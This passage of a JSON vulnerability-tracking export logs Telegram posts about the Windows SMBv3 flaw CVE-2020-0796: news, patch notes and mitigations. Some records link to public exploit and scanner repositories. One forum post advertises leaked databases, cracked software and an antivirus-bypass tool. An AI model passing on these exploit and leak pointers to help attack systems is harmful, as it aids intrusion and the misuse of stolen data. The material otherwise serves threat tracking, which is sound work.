networks, systems and applications against various scenarios and maintain the overall quality of the assessment.\n\nhttps://github.com/netbiosX/Checklists\n\n#cybersecurity #infosec\n\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory", "creation_timestamp": "2023-05-30T15:17:54.000000Z"}, {"uuid": "7158bb55-fa09-4f5c-aa9b-0236708c713e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/495", "content": "\u0410 \u0432\u0447\u0435\u0440\u0430, \u043f\u043e\u043a\u0430 \u043c\u044b \u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u043f\u043e\u0441\u0442 \u043f\u0440\u043e MONSOON, \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0435 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0438\u0437 Ricerca Security \u0437\u0430\u043f\u0438\u043b\u0438\u043b\u0438 \u0442\u0430\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 CVE-2020-0796, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0438\u0439 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430 \u0432 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u041c\u044b \u043f\u0438\u0441\u0430\u043b\u0438 \u043f\u0440\u043e \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0430\u0440\u0442\u0435.\n\n\u0412\u043f\u0440\u043e\u0447\u0435\u043c, \u043c\u044b \u043d\u0430\u0434\u0435\u0435\u043c\u0441\u044f, \u0447\u0442\u043e \u0432\u0441\u0435 \u0441\u043e\u0437\u043d\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043b\u044e\u0434\u0438 \u0443\u0436\u0435 \u0434\u0430\u0432\u043d\u043e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u043b\u0438 \u0441\u0432\u043e\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043a\u0438 \u043e\u0442 Microsoft \u0438 \u044d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SMBv3 \u0438\u043c \u043d\u0435 \u0441\u0442\u0440\u0430\u0448\u043d\u0430. \u0412 \u043f\u0440\u043e\u0442\u0438\u0432\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 - \u0442\u0438\u043a\u0430\u0439\u0442\u0435 \u0441 \u0433\u043e\u0440\u043e\u0434\u0443.", "creation_timestamp": "2020-04-21T11:53:35.000000Z"}, {"uuid": "8ef6c4d5-9087-4d25-ae28-8731af335f07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/true_secator/302", "content": "\u0412\u0447\u0435\u0440\u0430 Microsoft \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0442\u0447, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044e\u0449\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2020-0796 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 SMBv3.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0437\u0430\u0440\u0435\u043b\u0438\u0437\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 KB4551762 \u0434\u043b\u044f Windows 10 (\u0432\u0435\u0440\u0441\u0438\u0438 1903 \u04381909) \u0438 Windows Server 2019 (\u0432\u0435\u0440\u0441\u0438\u0438 1903 \u0438 1909). \u0412 \u043a\u043e\u0438-\u0442\u043e \u0432\u0435\u043a\u0438 \u0440\u0435\u0434\u043c\u043e\u043d\u0434\u043e\u0432\u0446\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u0431\u044b\u0441\u0442\u0440\u043e \u0437\u0430\u043f\u0438\u043b\u0438\u0442\u044c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u0443\u044e \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443.\n\n\u041a\u0430\u043a \u0438 \u0440\u0430\u043d\u044c\u0448\u0435, \u043c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u0441\u0440\u043e\u0447\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0430\u043f\u0434\u0435\u0439\u0442. \u041a\u0442\u043e \u043d\u0435 \u0441\u0434\u0435\u043b\u0430\u0435\u0442 - \u0442\u043e\u0442 \u0441\u0430\u043c \u0441\u0435\u0431\u0435 \u0411\u0443\u0440\u0430\u0442\u0438\u043d\u0430.\n\n\u041d\u043e SecAtor \u043d\u0435 \u0431\u044b\u043b \u0431\u044b SecAtor'\u043e\u043c, \u0435\u0441\u043b\u0438 \u0431\u044b \u0432 \u043b\u044e\u0431\u043e\u0439 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b \u0431\u044b \u043f\u043e\u0432\u043e\u0434 \u0434\u043b\u044f \u0441\u043a\u0435\u043f\u0442\u0438\u0446\u0438\u0437\u043c\u0430. \u0412\u043e\u0442 \u0438 \u0441\u0435\u0439\u0447\u0430\u0441 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0432\u043e\u043f\u0440\u043e\u0441 - \u0430 \u0435\u0441\u043b\u0438 \u0431\u044b 10 \u043c\u0430\u0440\u0442\u0430 Cisco Talos \u0438 Fortinet \u043d\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438,  \u0441\u0442\u0430\u043b\u0438 \u0431\u044b Microsoft \u0441\u0440\u043e\u0447\u043d\u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0430\u0442\u0447? \u0418\u043b\u0438 \u043a\u0430\u043a \u0432\u0441\u0435\u0433\u0434\u0430 \u0441\u0434\u0435\u043b\u0430\u043b\u0438 \u0431\u044b \u0432\u0438\u0434, \u0447\u0442\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442? \u0422\u0435\u043c \u0431\u043e\u043b\u0435\u0435, \u0447\u0442\u043e Security Affairs \u043f\u0438\u0448\u0443\u0442, \u0447\u0442\u043e \u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u0435 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0434\u044b\u0440\u043a\u0443 \u0432 \u043c\u0430\u0440\u0442\u043e\u0432\u0441\u043a\u0438\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u0445.\n \n\u0418 \u043d\u0435 \u043f\u043e\u0438\u043c\u0435\u043b\u0438 \u0431\u044b \u043c\u044b \u0442\u043e\u0433\u0434\u0430 \u043d\u043e\u0432\u044b\u0439 \u0448\u0442\u043e\u0440\u043c \u043a\u0430\u043a\u043e\u0433\u043e-\u043d\u0438\u0431\u0443\u0434\u044c NotVasya \u0438\u043b\u0438 WannaDie? \u0412\u0435\u0434\u044c \u044d\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u043e, \u0447\u0435\u0433\u043e \u043d\u0430\u043c \u0432\u0441\u0435\u043c \u0432 \u043d\u044b\u043d\u0435\u0448\u043d\u0435\u0439 \u043a\u0440\u0438\u0437\u0438\u0441\u043d\u043e\u0439 \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0442\u0430\u043a \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442 (\u0441\u0430\u0440\u043a\u0430\u0437\u043c).\n\nhttps://securityaffairs.co/wordpress/99507/security/cve-2020-0796-smbv3-bug-fix.html", "creation_timestamp": "2020-03-13T08:49:29.000000Z"}, {"uuid": "36b98573-db13-4e1c-93d4-df0aa011aa60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/true_secator/294", "content": "\u0412\u0447\u0435\u0440\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 SMBv3, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 CVE-2020-0796.\n\n\u0427\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u0441\u0430\u043c\u0430 Microsoft \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043d\u043e\u0432\u043e\u0439 \u0434\u044b\u0440\u043a\u0438 \u043d\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043e\u0442 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u044f\u0434 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0442\u0440\u0430\u043d\u0441\u043b\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0438\u0445 \u0448\u0438\u0440\u043e\u043a\u043e\u0439 \u043f\u0443\u0431\u043b\u0438\u043a\u0435.\n\nCVE-2020-0796 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435. \u0423\u044f\u0437\u0432\u0438\u043c\u044b Windows 10 v.1903, Windows Server v.1903, Windows 10 v.1909 \u0438 Windows Server v.1909, \u0445\u043e\u0442\u044f \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e Fortinet, \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0442\u0430\u043a\u0436\u0435 Windows 8 \u0438 Windows Server 2012. \n\n\u041f\u0440\u043e\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u0430\u044f \u043f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c \u0441 EternalBlue, NotPetya \u0438 WannaCry.\n\n\u0418 \u0445\u043e\u0442\u044f \u0440\u0430\u0431\u043e\u0447\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u043f\u043e\u043a\u0430 \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0432\u0438\u0434\u0435\u043b, Cisco Talos \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u0441\u0436\u0430\u0442\u0438\u044f SMBv3 \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 \u043f\u043e\u0440\u0442\u0430 TCP 445.\n\n\u0412\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u044f \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u0441\u0442\u044c WannaCry \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u043e\u0437\u0430\u0431\u043e\u0442\u0438\u0442\u0441\u044f \u043f\u0440\u0435\u0432\u0435\u043d\u0442\u0438\u0432\u043d\u044b\u043c\u0438 \u043c\u0435\u0440\u0430\u043c\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0438 \u0436\u0434\u0430\u0442\u044c \u043f\u0430\u0442\u0447\u0435\u0439 \u043e\u0442 Microsoft.\n\nhttps://www.bleepingcomputer.com/news/security/microsoft-leaks-info-on-wormable-windows-smbv3-cve-2020-0796-flaw/", "creation_timestamp": "2020-03-11T12:15:52.000000Z"}, {"uuid": "502a40bb-2f06-434d-971c-3ed541f4c353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/jokerplstaeen/17513", "content": "\u200b\u200bCVE-2020-0796\n\nWindows Protocol TestSuites is to trigger BSoD (full #exploit).\n\nhttps://github.com/Ajomix/CVE-2020-0796\n\n#cve #cybersecurity #infosec", "creation_timestamp": "2023-06-01T10:48:32.000000Z"}, {"uuid": "4c3da8a1-3fb9-487a-b5cb-6a587f5786e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/crackcodes/884", "content": "Updates On Hackbyte Forum:-\n\n\ud83d\udcccAndroidForums.com Leak\n\ud83d\udcccAll Shopify Stores in USA \u2013 Email Database 145 000\n\ud83d\udcccInsurance Agents and Brokers 31 000\n\ud83d\udcccHCL_AppScan_Standard_v10.0.8_Cracked\n\ud83d\udcccPakistani Documents Leak\n\ud83d\udcccPakistan Fortinet SSL VPN CVE-2018-13379\n\ud83d\udccciMesh.com Leak\n\ud83d\udcccAptoide.com Leak\n\ud83d\udcccromwe.com Leak\n\ud83d\udcccCloud Attack Vectors\n\ud83d\udcccTproxy: A cli tool to proxy and analyze TCP connections\n\ud83d\udcccRaider - Web Authentication Testing Framework\n\ud83d\udcccDiagTrackEoP - Just another way to abuse SeImpersonate privilege.\n\ud83d\udcccSQLI Dorks Generator\n\ud83d\udcccEthical_Hacking\n\ud83d\udcccDorks collections list\n\ud83d\udcccNinjaDroid - Simple tool to reverse engineering #Android APK packages\n\ud83d\udcccSMBaloo - A CVE-2020-0796 (aka \u201cSMBGhost\u201d) exploit for Windows ARM64\n\ud83d\udcccCMSeeK - CMS Detection and Exploitation suite \u2013 Scan WordPress, Joomla, Drupal and over 180 other CMSs\n\ud83d\udcccMsfMania - Command line tool developed in Python that is designed to bypass antivirus software on Windows and Linux/Mac in the future.\n\ud83d\udcccSome nigeria student Leak\n\ud83d\udcccBitfinex.com 22k Leak\n\ud83d\udcccA repository of Windows persistence mechanisms\n\ud83d\udcccDefeating Javascript Obfuscation\n\ud83d\udcccspring cloud gateway RCE | CVE-2022-22947 By :- VulnMachines\n\n\ud83d\udc49\ud83c\udffb\ud83d\udc49\ud83c\udffb Updates:- https://bit.ly/3yRyah3 \ud83d\udc48\ud83c\udffb\ud83d\udc48\ud83c\udffb", "creation_timestamp": "2022-07-24T09:26:19.000000Z"}, {"uuid": "bb7323b8-8a48-4733-8b2d-541e5bbdce86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/DerechodelaRed/2616", "content": "\u2699\ufe0fSMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\nhttps://github.com/ollypwn/SMBGhost", "creation_timestamp": "2020-03-12T09:20:50.000000Z"}, {"uuid": "75a0b5a5-00fb-484c-b1c6-2e59973da24d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/information_security_channel/36576", "content": "CVE-2020-0796 : Windows SMBv3 Client/Server Remote Code Execution Vulnerability\nhttps://kalilinuxtutorials.com/cve-2020-0796/\n\nCVE-2020-0796 is a remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client. To exploit the vulnerability against a server, an unauthenticated attacker could send [\u2026]\nThe post CVE-2020-0796 : Windows SMBv3 Client/Server Remote Code Execution Vulnerability (https://kalilinuxtutorials.com/cve-2020-0796/) appeared first on Kali Linux Tutorials (https://kalilinuxtutorials.com/).", "creation_timestamp": "2020-04-03T17:55:34.000000Z"}, {"uuid": "ef90764a-53ff-4a3e-94af-e6c5a7be97e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/information_security_channel/36574", "content": "CVE-2020-0796 : Windows SMBv3 Client/Server Remote Code Execution Vulnerability https://t.co/CnwumWEt0E", "creation_timestamp": "2020-04-03T17:44:07.000000Z"}, {"uuid": "5a4ad1c3-4036-4da0-aff4-c41baee995f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/BlueRedTeam/1207", "content": "#exploit \nhttps://github.com/danigargu/CVE-2020-0796\n@BlueRedTeam", "creation_timestamp": "2021-11-22T20:23:30.000000Z"}, {"uuid": "d57b5226-1cbc-4019-a9f3-0ecbb8579a11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/xakep_ru/8836", "content": "Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u043e\u043c \u0447\u0435\u0440\u0432\u044f\n\n\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0431\u0430\u0433\u0430 CVE-2020-0796, \u043d\u0435 \u0432\u043e\u0448\u0435\u0434\u0448\u0435\u0435 \u0432 \u0441\u043e\u0441\u0442\u0430\u0432 \u00ab\u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439\u00bb, \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0443\u0436\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Windows 10 \u0438 Windows Server 2019 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\nhttps://xakep.ru/2020/03/12/cve-2020-0796-patch/", "creation_timestamp": "2020-03-12T19:45:07.000000Z"}, {"uuid": "d984f0ba-4e0c-42d2-9a05-879cd9ecd058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/xakep_ru/8939", "content": "\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SMBGhost\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b \u0434\u043b\u044f \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 Windows \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-0796, \u043e\u0431\u043b\u0430\u0434\u0430\u044e\u0449\u0435\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u043e\u043c \u0447\u0435\u0440\u0432\u044f.\n\nhttps://xakep.ru/2020/04/02/smbghost-pocs/", "creation_timestamp": "2020-04-02T17:55:26.000000Z"}, {"uuid": "fc53fa3c-d349-4595-9f1a-499c756051ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/xakep_ru/9031", "content": "\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SMBGhost\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442 \u0438\u0437 Ricerca Security \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0438 \u043f\u0440\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b RCE-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-0796, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a SMBGhost.\n\nhttps://xakep.ru/2020/04/22/smbghost-poc/", "creation_timestamp": "2020-04-22T17:20:16.000000Z"}, {"uuid": "bfcffcae-5f9a-4e4d-8330-74bf2c98124c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/information_security_channel/35873", "content": "CVE-2020-0796 \u2013 A \u201cwormable\u201d Remote Code Execution vulnerability in SMB v3\nhttps://blogs.quickheal.com/cve-2020-0796-wormable-remote-code-execution-vulnerability-smb-v3/\n\nSince last two days, the Internet is rife with news around a critical remote code execution vulnerability in SMBv3.1.1 compression mechanism. Today, on 12th March 2020 Microsoft has released an emergency out-of-band patch to address this vulnerability. As per Microsoft release information, it\u2019s a remote code execution vulnerability in the\u2026", "creation_timestamp": "2020-03-13T04:38:09.000000Z"}, {"uuid": "e9350a73-a933-4985-b371-ce55dca15e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/information_security_channel/35836", "content": "Microsoft leaked details of an unpatched bug that exists in the Server Message Block 3.0 (SMBv3) network communication protocol reported as part of the March 2020 Patch Tuesday update. The flaw can be tracked as CVE-2020-0796 and the flaw impacts only Windows 10 Version and Windows Server Version 1903. Wormable Windows SMBv3 The vulnerability resides [\u2026]\nThe post Unpatched Wormable Windows SMBv3 RCE Flaw Leaked in Microsoft Patch Tuesday (https://gbhackers.com/wormable-windows-smbv3/) appeared first on GBHackers On Security (https://gbhackers.com/).", "creation_timestamp": "2020-03-12T05:03:11.000000Z"}, {"uuid": "c75780d5-3be5-4a5f-a640-91d12b101228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/information_security_channel/35876", "content": "Microsoft patched a critical Remote Code Execution Vulnerability with Windows SMBv3 Client/Server that allows an attacker to execute code remotely. The flaw can be tracked as CVE-2020-0796 and the flaw impacts only Windows 10 Version and Windows Server Version 1903. It was leaked accidentally as part of the March 2020 Patch Tuesday update. SMBv3 RCE [\u2026]\nThe post Microsoft Released Patches for Wormable Windows SMBv3 RCE Flaw \u2013 More than 48000 Hosts Vulnerable (https://gbhackers.com/smbv3-rce-flaw/) appeared first on GBHackers On Security (https://gbhackers.com/).", "creation_timestamp": "2020-03-13T05:29:18.000000Z"}, {"uuid": "bf0c086c-9438-4c8f-9f3c-7e099b2e4e68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/information_security_channel/36475", "content": "SMBGhost Vulnerability Allows Privilege Escalation on Windows Systems\nhttp://feedproxy.google.com/~r/Securityweek/~3/UuwaqWrYdrk/smbghost-vulnerability-allows-privilege-escalation-windows-systems\n\nResearchers have published proof-of-concept (PoC) exploits to demonstrate that the Windows vulnerability tracked as SMBGhost (https://www.securityweek.com/microsoft-working-patches-wormable-smb-vulnerability) and CVE-2020-0796 can be exploited for local privilege escalation.\nread more (https://www.securityweek.com/smbghost-vulnerability-allows-privilege-escalation-windows-systems)", "creation_timestamp": "2020-04-01T11:46:20.000000Z"}, {"uuid": "0004eb95-edc5-47b7-be45-64acc6855924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/thehackernews/636", "content": "CVE-2020-0796\n\nMicrosoft warning billions of users of a new UNPATCHED \"wormable\" RCE flaw in SMBv3 protocol\u2014after its existence accidentally got leaked.\n\nRead: https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html\n\nDisable SMB compression & block SMB (port 137, 139, 445) inbound/outbound to avoid attacks.", "creation_timestamp": "2020-03-11T16:10:37.000000Z"}, {"uuid": "77801744-97fc-41de-a03e-c749401bb1fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/canyoupwnme/6321", "content": "SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\nhttps://github.com/ollypwn/SMBGhost", "creation_timestamp": "2020-03-12T08:22:22.000000Z"}, {"uuid": "548436bd-765a-4bc2-b5e2-1c8dc8f1eb8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/canyoupwnme/6324", "content": "CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability\nSecurity Vulnerability\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796", "creation_timestamp": "2020-03-12T18:15:03.000000Z"}, {"uuid": "826b5a39-8b9c-46d5-8214-d24adca75af4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 